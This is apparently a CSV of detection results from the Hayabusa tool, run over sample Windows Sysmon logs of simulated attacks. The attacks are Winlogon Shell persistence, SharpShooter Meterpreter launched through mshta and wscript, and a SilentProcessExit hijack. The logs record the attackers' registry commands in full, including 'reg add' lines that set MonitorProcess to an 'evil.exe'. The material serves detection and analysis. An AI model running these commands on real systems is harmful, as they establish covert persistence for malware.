2019-06-15 07:22:17.988 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1336d | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:21.503 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Winlogon Shell | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"",explorer.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:21.535 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:31.957 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\Downloads\a.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:31.957 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:32.222 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1584 | PGUID: 365ABB72-1E28-5D04-0000-0010EC030B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:47.253 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1552 | PGUID: 365ABB72-1E37-5D04-0000-001049360B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:52.457 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:52.503 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.441 +09:00,IEWIN7,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 688 | PGUID: 365ABB72-1E3F-5D04-0000-0010EC890B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.503 +09:00,IEWIN7,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 488 | PGUID: 365ABB72-1E3F-5D04-0000-0010568A0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.566 +09:00,IEWIN7,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 1228 | PGUID: 365ABB72-1E3F-5D04-0000-0010FF8D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:22:55.707 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 948 | PGUID: 365ABB72-1E3F-5D04-0000-00102B9C0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:06.691 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Process: C:\Windows\System32\dllhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2128 | PGUID: 365ABB72-1E4A-5D04-0000-0010ECC20B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:07.019 +09:00,IEWIN7,1,info,,Process Created,Cmd: efsui.exe /efs /keybackup | Process: C:\Windows\System32\efsui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0xbc013 | PID: 2264 | PGUID: 365ABB72-1E4A-5D04-0000-0010BACF0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:07.082 +09:00,IEWIN7,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 1628 | PGUID: 365ABB72-1E4A-5D04-0000-001016D70B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.894 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 3448 | PGUID: 365ABB72-1E51-5D04-0000-00104C340C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3444 | PGUID: 365ABB72-1E51-5D04-0000-00107B380C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Evas,Suspicious Userinit Child Process,,rules/sigma/process_creation/proc_creation_win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:13.972 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3620 | PGUID: 365ABB72-1E51-5D04-0000-001065390C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:15.054 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\VBoxTray.exe"" | Process: C:\Windows\System32\VBoxTray.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 3920 | PGUID: 365ABB72-1E52-5D04-0000-00101D700C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:16.592 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:23.405 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 2040 | PGUID: 365ABB72-1E5B-5D04-0000-00109EF80C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:26.811 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:26.811 +09:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:26.999 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 2980 | PGUID: 365ABB72-1E5E-5D04-0000-0010EF5E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 07:23:53.358 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0xbc013 | PID: 3284 | PGUID: 365ABB72-1E79-5D04-0000-0010EADE0E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html | LID: 0x135a4 | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:13:44.106 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:14:32.809 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x135a4 | PID: 3892 | PGUID: 365ABB72-9AD8-5D04-0000-0010C08C1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:21:50.488 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135a4 | PID: 540 | PGUID: 365ABB72-9C8E-5D04-0000-0010D0421600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:21:51.035 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 984 | PGUID: 365ABB72-9C8E-5D04-0000-001080561600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" | Process: C:\Windows\System32\wscript.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:05.973 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600 | Hash: SHA1=F4F7354475114E39447975211F5D0A5FA8DB8367,MD5=77B25423AD769057258786540205F6C8,SHA256=20B2A5B34D764D92028CF5EAB46A91F2F7F1A0ECC3FEBA4FC3CDF881AB3A136C,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-15 16:22:08.473 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49162 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\wscript.exe | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
2019-06-20 02:22:37.897 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1356 | PGUID: 365ABB72-6F5D-5D0A-0000-00109B331300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\ReportingMode: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:45.694 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess: C:\windows\temp\evil.exe | Process: C:\Windows\system32\reg.exe | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:55.397 +09:00,IEWIN7,1,info,,Process Created,"Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1352 | PGUID: 365ABB72-6F6F-5D0A-0000-001046451300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:58.944 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\windows\temp\evil.exe | Process: C:\Windows\Temp\evil.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0 | LID: 0x134a4 | PID: 2112 | PGUID: 365ABB72-6F72-5D0A-0000-001004551300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
2019-06-20 02:22:58.944 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
